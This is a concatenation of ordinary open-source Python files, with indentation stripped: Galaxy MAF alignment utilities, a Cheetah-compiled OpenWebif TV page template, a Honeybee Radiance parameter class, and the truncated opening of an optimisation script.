if index >= self.size or index < 0: raise Exception( "Your index (%i) is out of range (0 - %i)." % ( index, self.size - 1 ) )
if len( bases ) == 0: raise Exception( "A set of genomic positions can only have a positive length." )
if species not in self.sequences.keys(): self.add_species( species )
file_index, fh = self.temp_file_handler.get_open_tempfile( self.sequences[species] )
fh.seek( index )
fh.write( bases )
#Flush temp file of specified species, or all species
def flush( self, species = None ):
if species is None:
species = self.sequences.keys()
elif not isinstance( species, list ):
species = [species]
for spec in species:
self.temp_file_handler.flush( self.sequences[spec] )
class GenomicRegionAlignment( RegionAlignment ):
def __init__( self, start, end, species = [], temp_file_handler = None ):
RegionAlignment.__init__( self, end - start, species, temp_file_handler=temp_file_handler )
self.start = start
self.end = end
class SplicedAlignment( object ):
DNA_COMPLEMENT = string.maketrans( "ACGTacgt", "TGCAtgca" )
def __init__( self, exon_starts, exon_ends, species = [], temp_file_handler = None ):
if not isinstance( exon_starts, list ):
exon_starts = [exon_starts]
if not isinstance( exon_ends, list ):
exon_ends = [exon_ends]
assert len( exon_starts ) == len( exon_ends ), "The number of starts does not match the number of sizes."
self.exons = []
if not temp_file_handler:
temp_file_handler = TempFileHandler()
self.temp_file_handler = temp_file_handler
for i in range( len( exon_starts ) ):
self.exons.append( GenomicRegionAlignment( exon_starts[i], exon_ends[i], species, temp_file_handler=temp_file_handler ) )
#returns the names for species found in alignment, skipping names as requested
def get_species_names( self, skip = [] ):
if not isinstance( skip, list ): skip = [skip]
names = []
for exon in self.exons:
for name in exon.get_species_names( skip = skip ):
if name not in names:
names.append( name )
return names
#returns the sequence for a species
def get_sequence( self, species ):
index, fh = self.temp_file_handler.get_open_tempfile()
for exon in self.exons:
if species in exon.get_species_names():
seq = exon.get_sequence( species )
# we need to refetch fh here, since exon.get_sequence( species ) uses a tempfile
# and if max==1, it would close fh
index, fh = self.temp_file_handler.get_open_tempfile( index )
fh.write( seq )
else:
fh.write( "-" * exon.size )
fh.seek( 0 )
rval = fh.read()
self.temp_file_handler.close( index, delete=True )
return rval
#returns the reverse complement of the sequence for a species
def get_sequence_reverse_complement( self, species ):
complement = [base for base in self.get_sequence( species ).translate( self.DNA_COMPLEMENT )]
complement.reverse()
return "".join( complement )
#Start and end of coding region
@property
def start( self ):
return self.exons[0].start
@property
def end( self ):
return self.exons[-1].end
#Open a MAF index using a UID
def maf_index_by_uid( maf_uid, index_location_file ):
for line in open( index_location_file ):
try:
#read each line, if not enough fields, go to next line
if line[0:1] == "#" : continue
fields = line.split('\t')
if maf_uid == fields[1]:
try:
maf_files = fields[4].replace( "\n", "" ).replace( "\r", "" ).split( "," )
return bx.align.maf.MultiIndexed( maf_files, keep_open = True, parse_e_rows = False )
except Exception, e:
raise Exception( 'MAF UID (%s) found, but configuration appears to be malformed: %s' % ( maf_uid, e ) )
except:
pass
return None
#return ( index, temp_index_filename ) for user maf, if available, or build one and return it, return None when no tempfile is created
def open_or_build_maf_index( maf_file, index_filename, species = None ):
try:
return ( bx.align.maf.Indexed( maf_file, index_filename = index_filename, keep_open = True, parse_e_rows = False ), None )
except:
return build_maf_index( maf_file, species = species )
def build_maf_index_species_chromosomes( filename, index_species = None ):
species = []
species_chromosomes = {}
indexes = bx.interval_index_file.Indexes()
blocks = 0
try:
maf_reader = bx.align.maf.Reader( open( filename ) )
while True:
pos = maf_reader.file.tell()
block = maf_reader.next()
if block is None:
break
blocks += 1
for c in block.components:
spec = c.src
chrom = None
if "." in spec:
spec, chrom = spec.split( ".", 1 )
if spec not in species:
species.append( spec )
species_chromosomes[spec] = []
if chrom and chrom not in species_chromosomes[spec]:
species_chromosomes[spec].append( chrom )
if index_species is None or spec in index_species:
forward_strand_start = c.forward_strand_start
forward_strand_end = c.forward_strand_end
try:
forward_strand_start = int( forward_strand_start )
forward_strand_end = int( forward_strand_end )
except ValueError:
continue #start and end are not integers, can't add component to index, goto next component
#this likely only occurs when parse_e_rows is True?
#could a species exist as only e rows? should the
if forward_strand_end > forward_strand_start:
#require positive length; i.e. certain lines have start = end = 0 and cannot be indexed
indexes.add( c.src, forward_strand_start, forward_strand_end, pos, max=c.src_size )
except Exception, e:
#most likely a bad MAF
log.debug( 'Building MAF index on %s failed: %s' % ( filename, e ) )
return ( None, [], {}, 0 )
return ( indexes, species, species_chromosomes, blocks )
#builds and returns ( index, index_filename ) for specified maf_file
def build_maf_index( maf_file, species = None ):
indexes, found_species, species_chromosomes, blocks = build_maf_index_species_chromosomes( maf_file, species )
if indexes is not None:
fd, index_filename = tempfile.mkstemp()
out = os.fdopen( fd, 'w' )
indexes.write( out )
out.close()
return ( bx.align.maf.Indexed( maf_file, index_filename = index_filename, keep_open = True, parse_e_rows = False ), index_filename )
return ( None, None )
def component_overlaps_region( c, region ):
if c is None: return False
start, end = c.get_forward_strand_start(), c.get_forward_strand_end()
if region.start >= end or region.end <= start:
return False
return True
def chop_block_by_region( block, src, region, species = None, mincols = 0 ):
# This chopping method was designed to maintain consistency with how start/end padding gaps have been working in Galaxy thus far:
# behavior as seen when forcing blocks to be '+' relative to src sequence (ref) and using block.slice_by_component( ref, slice_start, slice_end )
# whether-or-not this is the 'correct' behavior is questionable, but this will at least maintain consistency
# comments welcome
slice_start = block.text_size #max for the min()
slice_end = 0 #min for the max()
old_score = block.score #save old score for later use
# We no longer assume only one occurance of src per block, so we need to check them all
for c in iter_components_by_src( block, src ):
if component_overlaps_region( c, region ):
if c.text is not None:
rev_strand = False
if c.strand == "-":
#We want our coord_to_col coordinates to be returned from positive stranded component
rev_strand = True
c = c.reverse_complement()
start = max( region.start, c.start )
end = min( region.end, c.end )
start = c.coord_to_col( start )
end = c.coord_to_col( end )
if rev_strand:
#need to orient slice coordinates to the original block direction
slice_len = end - start
end = len( c.text ) - start
start = end - slice_len
slice_start = min( start, slice_start )
slice_end = max( end, slice_end )
if slice_start < slice_end:
block = block.slice( slice_start, slice_end )
if block.text_size > mincols:
# restore old score, may not be accurate, but it is better than 0 for everything?
block.score = old_score
if species is not None:
block = block.limit_to_species( species )
block.remove_all_gap_columns()
return block
return None
def orient_block_by_region( block, src, region, force_strand = None ):
#loop through components matching src,
#make sure each of these components overlap region
#cache strand for each of overlaping regions
#if force_strand / region.strand not in strand cache, reverse complement
### we could have 2 sequences with same src, overlapping region, on different strands, this would cause no reverse_complementing
strands = [ c.strand for c in iter_components_by_src( block, src ) if component_overlaps_region( c, region ) ]
if strands and ( force_strand is None and region.strand not in strands ) or ( force_strand is not None and force_strand not in strands ):
block = block.reverse_complement()
return block
def get_oriented_chopped_blocks_for_region( index, src, region, species = None, mincols = 0, force_strand = None ):
for block, idx, offset in get_oriented_chopped_blocks_with_index_offset_for_region( index, src, region, species, mincols, force_strand ):
yield block
def get_oriented_chopped_blocks_with_index_offset_for_region( index, src, region, species = None, mincols = 0, force_strand = None ):
for block, idx, offset in get_chopped_blocks_with_index_offset_for_region( index, src, region, species, mincols ):
yield orient_block_by_region( block, src, region, force_strand ), idx, offset
#split a block with multiple occurances of src into one block per src
def iter_blocks_split_by_src( block, src ):
for src_c in iter_components_by_src( block, src ):
new_block = bx.align.Alignment( score=block.score, attributes=deepcopy( block.attributes ) )
new_block.text_size = block.text_size
for c in block.components:
if c == src_c or c.src != src:
new_block.add_component( deepcopy( c ) ) #components have reference to alignment, dont want to loose reference to original alignment block in original components
yield new_block
#split a block into multiple blocks with all combinations of a species appearing only once per block
def iter_blocks_split_by_species( block, species = None ):
def __split_components_by_species( components_by_species, new_block ):
if components_by_species:
#more species with components to add to this block
components_by_species = deepcopy( components_by_species )
spec_comps = components_by_species.pop( 0 )
for c in spec_comps:
newer_block = deepcopy( new_block )
newer_block.add_component( deepcopy( c ) )
for value in __split_components_by_species( components_by_species, newer_block ):
yield value
else:
#no more components to add, yield this block
yield new_block
#divide components by species
spec_dict = {}
if not species:
species = []
for c in block.components:
spec, chrom = src_split( c.src )
if spec not in spec_dict:
spec_dict[ spec ] = []
species.append( spec )
spec_dict[ spec ].append( c )
else:
for spec in species:
spec_dict[ spec ] = []
for c in iter_components_by_src_start( block, spec ):
spec_dict[ spec ].append( c )
empty_block = bx.align.Alignment( score=block.score, attributes=deepcopy( block.attributes ) ) #should we copy attributes?
empty_block.text_size = block.text_size
#call recursive function to split into each combo of spec/blocks
for value in __split_components_by_species( spec_dict.values(), empty_block ):
sort_block_components_by_block( value, block ) #restore original component order
yield value
#generator yielding only chopped and valid blocks for a specified region
def get_chopped_blocks_for_region( index, src, region, species = None, mincols = 0 ):
for block, idx, offset in get_chopped_blocks_with_index_offset_for_region( index, src, region, species, mincols ):
yield block
def get_chopped_blocks_with_index_offset_for_region( index, src, region, species = None, mincols = 0 ):
for block, idx, offset in index.get_as_iterator_with_index_and_offset( src, region.start, region.end ):
block = chop_block_by_region( block, src, region, species, mincols )
if block is not None:
yield block, idx, offset
#returns a filled region alignment for specified regions
def get_region_alignment( index, primary_species, chrom, start, end, strand = '+', species = None, mincols = 0, overwrite_with_gaps = True, temp_file_handler = None ):
if species is not None: alignment = RegionAlignment( end - start, species, temp_file_handler=temp_file_handler )
else: alignment = RegionAlignment( end - start, primary_species, temp_file_handler=temp_file_handler )
return fill_region_alignment( alignment, index, primary_species, chrom, start, end, strand, species, mincols, overwrite_with_gaps )
#reduces a block to only positions exisiting in the src provided
def reduce_block_by_primary_genome( block, species, chromosome, region_start ):
#returns ( startIndex, {species:texts}
#where texts' contents are reduced to only positions existing in the primary genome
src = "%s.%s" % ( species, chromosome )
ref = block.get_component_by_src( src )
start_offset = ref.start - region_start
species_texts = {}
for c in block.components:
species_texts[ c.src.split( '.' )[0] ] = list( c.text )
#remove locations which are gaps in the primary species, starting from the downstream end
for i in range( len( species_texts[ species ] ) - 1, -1, -1 ):
if species_texts[ species ][i] == '-':
for text in species_texts.values():
text.pop( i )
for spec, text in species_texts.items():
species_texts[spec] = ''.join( text )
return ( start_offset, species_texts )
#fills a region alignment
def fill_region_alignment( alignment, index, primary_species, chrom, start, end, strand = '+', species = None, mincols = 0, overwrite_with_gaps = True ):
region = bx.intervals.Interval( start, end )
region.chrom = chrom
region.strand = strand
primary_src = "%s.%s" % ( primary_species, chrom )
#Order blocks overlaping this position by score, lowest first
blocks = []
for block, idx, offset in index.get_as_iterator_with_index_and_offset( primary_src, start, end ):
score = float( block.score )
for i in range( 0, len( blocks ) ):
if score < blocks[i][0]:
blocks.insert( i, ( score, idx, offset ) )
break
else:
blocks.append( ( score, idx, offset ) )
#gap_chars_tuple = tuple( GAP_CHARS )
gap_chars_str = ''.join( GAP_CHARS )
#Loop through ordered blocks and layer by increasing score
for block_dict in blocks:
for block in iter_blocks_split_by_species( block_dict[1].get_at_offset( block_dict[2] ) ): #need to handle each occurance of sequence in block seperately
if component_overlaps_region( block.get_component_by_src( primary_src ), region ):
block = chop_block_by_region( block, primary_src, region, species, mincols ) #chop block
block = orient_block_by_region( block, primary_src, region ) #orient block
start_offset, species_texts = reduce_block_by_primary_genome( block, primary_species, chrom, start )
for spec, text in species_texts.items():
#we should trim gaps from both sides, since these are not positions in this species genome (sequence)
text = text.rstrip( gap_chars_str )
gap_offset = 0
while True in [ text.startswith( gap_char ) for gap_char in GAP_CHARS ]: #python2.4 doesn't accept a tuple for .startswith()
#while text.startswith( gap_chars_tuple ):
gap_offset += 1
text = text[1:]
if not text:
break
if text:
if overwrite_with_gaps:
alignment.set_range( start_offset + gap_offset, spec, text )
else:
for i, char in enumerate( text ):
if char not in GAP_CHARS:
alignment.set_position( start_offset + gap_offset + i, spec, char )
return alignment
#returns a filled spliced region alignment for specified region with start and end lists
def get_spliced_region_alignment( index, primary_species, chrom, starts, ends, strand = '+', species = None, mincols = 0, overwrite_with_gaps = True, temp_file_handler = None ):
#create spliced alignment object
if species is not None: alignment = SplicedAlignment( starts, ends, species, temp_file_handler=temp_file_handler )
else: alignment = SplicedAlignment( starts, ends, [primary_species], temp_file_handler=temp_file_handler )
for exon in alignment.exons:
fill_region_alignment( exon, index, primary_species, chrom, exon.start, exon.end, strand, species, mincols, overwrite_with_gaps )
return alignment
#loop through string array, only return non-commented lines
def line_enumerator( lines, comment_start = '#' ):
i = 0
for line in lines:
if not line.startswith( comment_start ):
i += 1
yield ( i, line )
#read a GeneBed file, return list of starts, ends, raw fields
def get_starts_ends_fields_from_gene_bed( line ):
#Starts and ends for exons
starts = []
ends = []
fields = line.split()
#Requires atleast 12 BED columns
if len(fields) < 12:
raise Exception( "Not a proper 12 column BED line (%s)." % line )
chrom = fields[0]
tx_start = int( fields[1] )
tx_end = int( fields[2] )
name = fields[3]
strand = fields[5]
if strand != '-': strand='+' #Default strand is +
cds_start = int( fields[6] )
cds_end = int( fields[7] )
#Calculate and store starts and ends of coding exons
region_start, region_end = cds_start, cds_end
exon_starts = map( int, fields[11].rstrip( ',\n' ).split( ',' ) )
exon_starts = map( ( lambda x: x + tx_start ), exon_starts )
exon_ends = map( int, fields[10].rstrip( ',' ).split( ',' ) )
exon_ends = map( ( lambda x, y: x + y ), exon_starts, exon_ends );
for start, end in zip( exon_starts, exon_ends ):
start = max( start, region_start )
end = min( end, region_end )
if start < end:
starts.append( start )
ends.append( end )
return ( starts, ends, fields )
def iter_components_by_src( block, src ):
for c in block.components:
if c.src == src:
yield c
def get_components_by_src( block, src ):
return [ value for value in iter_components_by_src( block, src ) ]
def iter_components_by_src_start( block, src ):
for c in block.components:
if c.src.startswith( src ):
yield c
def get_components_by_src_start( block, src ):
return [ value for value in iter_components_by_src_start( block, src ) ]
def sort_block_components_by_block( block1, block2 ):
#orders the components in block1 by the index of the component in block2
#block1 must be a subset of block2
#occurs in-place
return block1.components.sort( cmp = lambda x, y: block2.components.index( x ) - block2.components.index( y ) )
def get_species_in_maf( maf_filename ):
species = []
for block in bx.align.maf.Reader( open( maf_filename ) ):
for spec in get_species_in_block( block ):
if spec not in species:
species.append( spec )
return species
def parse_species_option( species ):
if species:
species = species.split( ',' )
if 'None' not in species:
return species
return None #provided species was '', None, or had 'None' in it
def remove_temp_index_file( index_filename ):
try: os.unlink( index_filename )
except: pass
#Below are methods to deal with FASTA files
def get_fasta_header( component, attributes = {}, suffix = None ):
header = ">%s(%s):%i-%i|" % ( component.src, component.strand, component.get_forward_strand_start(), component.get_forward_strand_end() )
for key, value in attributes.iteritems():
header = "%s%s=%s|" % ( header, key, value )
if suffix:
header = "%s%s" % ( header, suffix )
else:
header = "%s%s" % ( header, src_split( component.src )[ 0 ] )
return header
def get_attributes_from_fasta_header( header ):
if not header: return {}
attributes = {}
header = header.lstrip( '>' )
header = header.strip()
fields = header.split( '|' )
try:
region = fields[0]
region = region.split( '(', 1 )
temp = region[0].split( '.', 1 )
attributes['species'] = temp[0]
if len( temp ) == 2:
attributes['chrom'] = temp[1]
else:
attributes['chrom'] = temp[0]
region = region[1].split( ')', 1 )
attributes['strand'] = region[0]
region = region[1].lstrip( ':' ).split( '-' )
attributes['start'] = int( region[0] )
attributes['end'] = int( region[1] )
except:
#fields 0 is not a region coordinate
pass
if len( fields ) > 2:
for i in xrange( 1, len( fields ) - 1 ):
prop = fields[i].split( '=', 1 )
if len( prop ) == 2:
attributes[ prop[0] ] = prop[1]
if len( fields ) > 1:
attributes['__suffix__'] = fields[-1]
return attributes
def iter_fasta_alignment( filename ):
class fastaComponent:
def __init__( self, species, text = "" ):
self.species = species
self.text = text
def extend( self, text ):
self.text = self.text + text.replace( '\n', '' ).replace( '\r', '' ).strip()
#yields a list of fastaComponents for a FASTA file
f = open( filename, 'rb' )
components = []
#cur_component = None
while True:
line = f.readline()
if not line:
if components:
yield components
return
line = line.strip()
if not line:
if components:
yield components
components = []
elif line.startswith( '>' ):
attributes = get_attributes_from_fasta_header( line )
components.append( fastaComponent( attributes['species'] ) )
elif components:
components[-1].extend( line )
| mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/lib/galaxy/tools/util/maf_utilities.py | Python | gpl-3.0 | 30,790 | [
"Galaxy"
] | ae3a1dba8632fca2df5e6576851fbf799af51f3b5644c90e0a4edf4408ada9ce |
#!/usr/bin/env python
##################################################
## DEPENDENCIES
import sys
import os
import os.path
try:
import builtins as builtin
except ImportError:
import __builtin__ as builtin
from os.path import getmtime, exists
import time
import types
from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion
from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple
from Cheetah.Template import Template
from Cheetah.DummyTransaction import *
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
from Cheetah.CacheRegion import CacheRegion
import Cheetah.Filters as Filters
import Cheetah.ErrorCatchers as ErrorCatchers
##################################################
## MODULE CONSTANTS
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
__CHEETAH_version__ = '2.4.4'
__CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0)
__CHEETAH_genTime__ = 1364979193.755666
__CHEETAH_genTimestamp__ = 'Wed Apr 3 17:53:13 2013'
__CHEETAH_src__ = '/home/fermi/Work/Model/tmsingle/openpli3.0/build-tmsingle/tmp/work/mips32el-oe-linux/enigma2-plugin-extensions-openwebif-0.1+git1+279a2577c3bc6defebd4bf9e61a046dcf7f37c01-r0.72/git/plugin/controllers/views/ajax/tv.tmpl'
__CHEETAH_srcLastModified__ = 'Wed Apr 3 17:10:17 2013'
__CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine'
if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
raise AssertionError(
'This template was compiled with Cheetah version'
' %s. Templates compiled before version %s must be recompiled.'%(
__CHEETAH_version__, RequiredCheetahVersion))
##################################################
## CLASSES
class tv(Template):
##################################################
## CHEETAH GENERATED METHODS
def __init__(self, *args, **KWs):
super(tv, self).__init__(*args, **KWs)
if not self._CHEETAH__instanceInitialized:
cheetahKWArgs = {}
allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
for k,v in KWs.items():
if k in allowedKWs: cheetahKWArgs[k] = v
self._initCheetahInstance(**cheetahKWArgs)
def respond(self, trans=None):
## CHEETAH: main method generated for this template
if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):
trans = self.transaction # is None unless self.awake() was called
if not trans:
trans = DummyTransaction()
_dummyTrans = True
else: _dummyTrans = False
write = trans.response().write
SL = self._CHEETAH__searchList
_filter = self._CHEETAH__currentFilter
########################################
## START - generated method body
write(u'''<div id="content_main">
\t<div id="tvcontentmain">
\t<div id="toolbar-header">
\t\t<span id="toolbar">
\t\t\t<span id="tvbutton">
\t\t\t\t<input type="radio" id="tvbutton0" name="tvbutton" /><label for="tvbutton0">Current</label>
\t\t\t\t<input type="radio" id="tvbutton1" name="tvbutton" checked="checked" /><label for="tvbutton1">Bouquets</label>
\t\t\t\t<input type="radio" id="tvbutton2" name="tvbutton" /><label for="tvbutton2">Providers</label>
\t\t\t\t<input type="radio" id="tvbutton3" name="tvbutton" /><label for="tvbutton3">Satellites</label>
\t\t\t\t<input type="radio" id="tvbutton4" name="tvbutton" /><label for="tvbutton4">All Channels</label>
\t\t\t\t<input type="radio" id="tvbutton5" name="tvbutton" /><label for="tvbutton5">EPG</label>
\t\t\t</span>
\t\t</span>
\t</div>
\t
\t<div id="tvcontent"></div>
\t</div>
</div>
<script type="text/javascript">
\t$(\'#tvbutton0\').click(function(){
\t\t$("#tvcontent").html(loadspinner).load("ajax/current");
\t});
\t$(\'#tvbutton1\').click(function(){
\t\t$("#tvcontent").html(loadspinner).load("ajax/bouquets");
\t});
\t$(\'#tvbutton2\').click(function(){
\t\t$("#tvcontent").html(loadspinner).load("ajax/providers");
\t});
\t$(\'#tvbutton3\').click(function(){
\t\t$("#tvcontent").load("ajax/satellites");
\t});
\t$(\'#tvbutton4\').click(function(){
\t\t$("#tvcontent").html(loadspinner).load("ajax/channels");
\t});
\t$(\'#tvbutton5\').click(function(){
\t\t$("#tvcontent").html(loadspinner).load(\'ajax/multiepg\');
\t});
\t
\t$( "#tvbutton" ).buttonset();
\t
\t$(document).ready(function() {
\t\t$("#tvcontent").load("ajax/bouquets");
\t});
</script>
''')
########################################
## END - generated method body
return _dummyTrans and trans.response().getvalue() or ""
##################################################
## CHEETAH GENERATED ATTRIBUTES
_CHEETAH__instanceInitialized = False
_CHEETAH_version = __CHEETAH_version__
_CHEETAH_versionTuple = __CHEETAH_versionTuple__
_CHEETAH_genTime = __CHEETAH_genTime__
_CHEETAH_genTimestamp = __CHEETAH_genTimestamp__
_CHEETAH_src = __CHEETAH_src__
_CHEETAH_srcLastModified = __CHEETAH_srcLastModified__
_mainCheetahMethod_for_tv= 'respond'
## END CLASS DEFINITION
if not hasattr(tv, '_initCheetahAttributes'):
templateAPIClass = getattr(tv, '_CHEETAH_templateClass', Template)
templateAPIClass._addCheetahPlumbingCodeToClass(tv)
# CHEETAH was developed by Tavis Rudd and Mike Orr
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/
##################################################
## if run from command line:
if __name__ == '__main__':
from Cheetah.TemplateCmdLineIface import CmdLineIface
CmdLineIface(templateObj=tv()).run()
| pli3/Openwebif | plugin/controllers/views/ajax/tv.py | Python | gpl-2.0 | 5,832 | [
"VisIt"
] | 9ccbe81b333269f64084a71e54c7e4b0354411b8a0dcc273ea8c44357ace9459 |
"""Radiance Parameters Base class with methods to add descriptor type parameters."""
from ._parametersbase import RadianceParameters
from ..datatype import RadiancePath, RadianceNumber, RadianceBoolFlag, \
RadianceTuple, RadianceValue
# TODO: Add __new__ to create a new class for each instance. After that the
# new paramters will be added only and only to that instance of the class since
# that is the only instance that uses that unique copy of the class.
# for now I'm using setattr(self.__class__, name, RadianceNumber(name,...))
# to minimize the damage (e.g. make sure the parameter won't be added to
# RadianceParameters). If user make a subclass from this class then it should
# work as expected.
class AdvancedRadianceParameters(RadianceParameters):
"""Radiance Parameters Base class with methods to add descriptor type parameters.
Usage:
class CustomParameters(AdvancedRadianceParameters):
pass
rp = CustomParameters()
rp.addRadianceNumber('ab', 'ambient bounces')
rp.ab = 20
rp.addRadianceValue('o', 'o f', isJoined=True)
rp.o = f
rp.addRadianceTuple('c', 'color', numType=int)
rp.c = (0, 0, 254)
rp.addRadianceBoolFlag('I', 'irradiance switch', isDualSign=True)
rp.I = True
print rp.toRadString()
> -ab 20 -of -c 0 0 254 +I
"""
def __init__(self):
"""Init parameters."""
RadianceParameters.__init__(self)
def __setattribute(self, name, value, attributeName=None):
_attrname = attributeName if attributeName is not None else name
# unfreeze the class so the new attribute can be added
self.tryToUnfreeze()
try:
setattr(self.__class__, _attrname, value)
# add name of the attribute to default parameters
self.addDefaultParameterName(_attrname, name)
except Exception as e:
if hasattr(self.__class__, _attrname):
self.addDefaultParameterName(_attrname, name)
# this is useful for cases that the environment caches the classes
# Grasshopper and Dynamo included
else:
raise Exception(e)
finally:
self.freeze()
def addRadianceNumber(self, name, descriptiveName=None, validRange=None,
acceptedInputs=None, numType=None, checkPositive=False,
attributeName=None):
"""Add a radiance number to parameters.
Attributes:
name: Required for all cases. Name of the flag, like 'ab' for '-ab 5'
in rtrace etc. Note that some of the radiance flags are actually
keywords in python. For example -or in rcollate or -as in rtrace.
In such cases the name of the flag should be specified as orX or
asX respectively. Refer the rcollate definition for an example.
descriptiveName: This is the human-readable name of the flag. For
example 'ambient divisions' for 'ab', 'view file' for 'vf' etc.
These descriptions are usually available in the manual pages of
Radiance. Although this is an optional input, for the purposes of
debugging and readability, it is strongly suggested that this input
be specified for all instances.
acceptedInputs:Optional. List of inputs that are permissible for a
particular command option. For example, the -h flag in rcollate
only accepts 'i' or 'o' as options. So, in cases where permissible
inputs are known it is recommended that this input be specified.If
the user-specified input doesn't exist in _acceptedInputs then a
value error will be raised.
validRange: Optional. The valid range for several prominent radiance
parameters is between 0 and 1. There are likely to be other
parameters with similar valid ranges. If _validRange is specified,
a warning will be issued in case the provided input is not within
that range.
checkPositive: Optional. Check if the number should be greater than
or equal to zero.
numType: Optional. Acceptable inputs are float or int. If specified, the
__set__ method will ensure that the value is stored in that type.
Also, if the number changes (for example from 4.212 to 4 due to int
being specified as _type_), then a warning will be issued.
attributeName: Optional. A string the will be used as the attribute
name that will be added to parameters class. If None name will be
used insted.
"""
# set the new attribute based on inputs
self.__setattribute(name,
RadianceNumber(name, descriptiveName, validRange,
acceptedInputs, numType,
checkPositive),
attributeName
)
def addRadianceValue(self, name, descriptiveName=None, acceptedInputs=None,
isJoined=False, attributeName=None):
"""
Add a radiance string value.
Attributes:
name: Required for all cases. Name of the flag, like 'ab' for '-ab 5'
in rtrace etc. Note that some of the radiance flags are actually
keywords in python. For example -or in rcollate or -as in rtrace.
In such cases the name of the flag should be specified as orX or
asX respectively. Refer the rcollate definition for an example.
descriptiveName: This is the human-readable name of the flag. For
example 'ambient divisions' for 'ab', 'view file' for 'vf' etc.
These descriptions are usually available in the manual pages of
Radiance. Although this is an optional input, for the purposes of
debugging and readability, it is strongly suggested that this input
be specified for all instances.
acceptedInputs:Optional. List of inputs that are permissible for a
particular command option. For example, the -h flag in rcollate
only accepts 'i' or 'o' as options. So, in cases where permissible
inputs are known it is recommended that this input be specified.If
the user-specified input doesn't exist in _acceptedInputs then a
value error will be raised.
isJoined: Set to True if the Boolean should be returned as a joined
output (i.e. -of, -od) (Default: False)
attributeName: Optional. A string the will be used as the attribute
name that will be added to parameters class. If None name will be
used insted.
"""
# set the new attribute based on inputs
self.__setattribute(name,
RadianceValue(name, descriptiveName, acceptedInputs,
None, isJoined),
attributeName
)
def addRadiancePath(self, name, descriptiveName=None, relativePath=None,
checkExists=False, extension=None, attributeName=None):
"""
Add a radiance file path.
Attributes:
name: Required for all cases. Name of the flag, like 'ab' for '-ab 5'
in rtrace etc. Note that some of the radiance flags are actually
keywords in python. For example -or in rcollate or -as in rtrace.
In such cases the name of the flag should be specified as orX or
asX respectively. Refer the rcollate definition for an example.
descriptiveName: This is the human-readable name of the flag. For
example 'ambient divisions' for 'ab', 'view file' for 'vf' etc.
These descriptions are usually available in the manual pages of
Radiance. Although this is an optional input, for the purposes of
debugging and readability, it is strongly suggested that this input
be specified for all instances.
relativePath: Optional. Start folder for relative path. Default is None
which returns absolute path.
checkExists: Optional. Check if the file exists. Useful in the case of
input files such as epw files etc. where it is essential for those
files to exist before the command executes.
extension: Optional. Test the extension of the file.
attributeName: Optional. A string the will be used as the attribute
name that will be added to parameters class. If None name will be
used insted.
"""
# set the new attribute based on inputs
self.__setattribute(name,
RadiancePath(name, descriptiveName, relativePath,
checkExists, extension),
attributeName
)
def addRadianceBoolFlag(self, name, descriptiveName=None, isDualSign=False,
attributeName=None):
"""Add a boolean value to parameters.
Attributes:
name: Required for all cases. Name of the flag, like 'ab' for '-ab 5'
in rtrace etc. Note that some of the radiance flags are actually
keywords in python. For example -or in rcollate or -as in rtrace.
In such cases the name of the flag should be specified as orX or
asX respectively. Refer the rcollate definition for an example.
descriptiveName: This is the human-readable name of the flag. For
example 'ambient divisions' for 'ab', 'view file' for 'vf' etc.
These descriptions are usually available in the manual pages of
Radiance. Although this is an optional input, for the purposes of
debugging and readability, it is strongly suggested that this input
be specified for all instances.
isDualSign: Set to True if the Boolean should return +/- value.
(i.e. +I/-I) (Default: False)
attributeName: Optional. A string the will be used as the attribute
name that will be added to parameters class. If None name will be
used insted.
"""
# set the new attribute based on inputs
self.__setattribute(name,
RadianceBoolFlag(name, descriptiveName, None,
isDualSign),
attributeName
)
def addRadianceTuple(self, name, descriptiveName=None, validRange=None,
acceptedInputs=None, tupleSize=None, numType=None,
attributeName=None):
"""Add a radiance numeric tuple e.g (0.5,0.3,0.2).
Attributes:
name: Required for all cases. Name of the flag, like 'ab' for '-ab 5'
in rtrace etc. Note that some of the radiance flags are actually
keywords in python. For example -or in rcollate or -as in rtrace.
In such cases the name of the flag should be specified as orX or
asX respectively. Refer the rcollate definition for an example.
descriptiveName: This is the human-readable name of the flag. For
example 'ambient divisions' for 'ab', 'view file' for 'vf' etc.
These descriptions are usually available in the manual pages of
Radiance. Although this is an optional input, for the purposes of
debugging and readability, it is strongly suggested that this input
be specified for all instances.
acceptedInputs:Optional. List of inputs that are permissible for a
particular command option. For example, the -h flag in rcollate
only accepts 'i' or 'o' as options. So, in cases where permissible
inputs are known it is recommended that this input be specified.If
the user-specified input doesn't exist in _acceptedInputs then a
value error will be raised.
validRange: Optional. The valid range for several prominent radiance
parameters is between 0 and 1. There are likely to be other
parameters with similar valid ranges. If _validRange is specified,
a warning will be issued in case the provided input is not within
that range.
tupleSize: Optional. Specify the number of inputs that are expected.
numType: Optional. Acceptable inputs are float or int. If specified, the
__set__ method will ensure that the value is stored in that type.
attributeName: Optional. A string the will be used as the attribute
name that will be added to parameters class. If None name will be
used insted.
"""
# set the new attribute based on inputs
self.__setattribute(name,
RadianceTuple(name, descriptiveName, validRange,
acceptedInputs, tupleSize, numType),
attributeName
)
| antonszilasi/honeybeex | honeybeex/honeybee/radiance/parameters/_advancedparametersbase.py | Python | gpl-3.0 | 13,739 | [
"EPW"
] | 485288995d5d9ae0ca5bf79b54a610796ba253fd0668c9a8ea49d1cd225ba55f |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import random
from __builtin__ import enumerate
import pulp
# !/usr/bin/python
# -*- coding: utf-8 -*-
import math
from collections import namedtuple
from collections import deque
from ortools.constraint_solver import pywrapcp
from ortools.linear_solver import pywraplp
import gflags
FLAGS = gflags.FLAGS
gflags.DEFINE_boolean('light_propagation', False, 'Use light propagation')
Point = namedtuple("Point", ['id', 'x', 'y'])
Segment = namedtuple("Segment", ['f', 't', 'id'])
Rect = namedtuple("Rect", ['x0', 'y0', 'x1', 'y1'])
def length(point1, point2):
